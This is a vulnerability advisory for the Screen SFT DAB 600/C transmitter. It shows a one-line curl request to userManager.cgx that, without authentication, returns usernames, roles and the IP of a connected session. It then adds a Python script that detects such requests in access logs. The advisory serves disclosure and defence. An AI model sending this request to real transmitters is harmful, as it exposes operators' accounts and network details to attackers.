Screen SFT DAB 600/C Unauthenticated Information Disclosure
Screen SFT DAB 600/C is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this via a specially crafted request to gain access to sensitive information including usernames and source IP addresses.
Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)

Vendor: DB Elettronica Telecomunicazioni SpA
Product web page: https://www.screen.it | https://www.dbbroadcast.com
                  https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
Affected version: Firmware: 1.9.3
                  Bios firmware: 7.1 (Apr 19 2021)
                  Gui: 2.46
                  FPGA: 169.55
                  uc: 6.15

Summary: Screen's new radio DAB Transmitter is reaching the highest
technology level in both Digital Signal Processing and RF domain.
SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
digital adaptive precorrection and configuration flexibility, the Hot
Swap System technology, the compactness and the smart system design,
the SFT DAB are advanced transmitters. They support standards DAB,
DAB+ and T-DMB and are compatible with major headend brands.

Desc: Screen is affected by an information disclosure vulnerability
due to improper access control enforcement. An unauthenticated remote
attacker can exploit this, via a specially crafted request, to gain
access to sensitive information including usernames and source IP
addresses.

Tested on: Keil-EWEB/2.1
           MontaVista® Linux® Carrier Grade eXpress (CGX)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5776
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php

19.03.2023

--

$ curl 'http://SFTDAB/system/api/userManager.cgx'
{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
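An added detection and triage example, not part of the advisory or of any vendor tooling: it flags access-log requests for the userManager.cgx endpoint that come from outside an assumed management network, and summarizes what a response like the one above discloses. The Common Log Format, the 192.168.178.0/24 management range and the sample log lines are all constructed assumptions; the transmitter's real log layout may differ.

```python
import ipaddress
import json
import re

# Endpoint named in advisory ZSL-2023-5776.
SENSITIVE_PATH = "/system/api/userManager.cgx"
# Assumed management network; requests from anywhere else are treated as untrusted.
MGMT_NETS = [ipaddress.ip_network("192.168.178.0/24")]

# Common Log Format is assumed here (constructed, not the device's real log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$'
)


def flag_sensitive_requests(log_lines):
    """Return (source_ip, path, status) for hits on the user-manager endpoint
    from outside MGMT_NETS. A 200 here means user data left the device."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if path != SENSITIVE_PATH:
            continue
        src = ipaddress.ip_address(m.group("ip"))
        if any(src in net for net in MGMT_NETS):
            continue
        findings.append((m.group("ip"), path, int(m.group("status"))))
    return findings


def summarize_disclosure(body):
    """Summarize what a userManager.cgx response reveals: account names, roles
    and the source IP of every connected session."""
    users = json.loads(body).get("ssbtObj", {}).get("users", [])
    return {
        "usernames": [u["user"] for u in users],
        "roles": {u["user"]: u["type"] for u in users},
        "connected_ips": [u["info"]["ip"] for u in users if u.get("connected") and u.get("info")],
    }


# Constructed sample input: one management-network hit and one from the outside.
SAMPLE_LOG = [
    '192.168.178.20 - - [19/Mar/2023:10:00:00 +0000] "GET /system/api/userManager.cgx HTTP/1.1" 200 312',
    '203.0.113.7 - - [19/Mar/2023:10:00:05 +0000] "GET /system/api/userManager.cgx?x=1 HTTP/1.1" 200 312',
    '203.0.113.7 - - [19/Mar/2023:10:00:06 +0000] "GET /index.html HTTP/1.1" 200 1024',
]
# The response body shown in the advisory.
SAMPLE_BODY = '{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}'
```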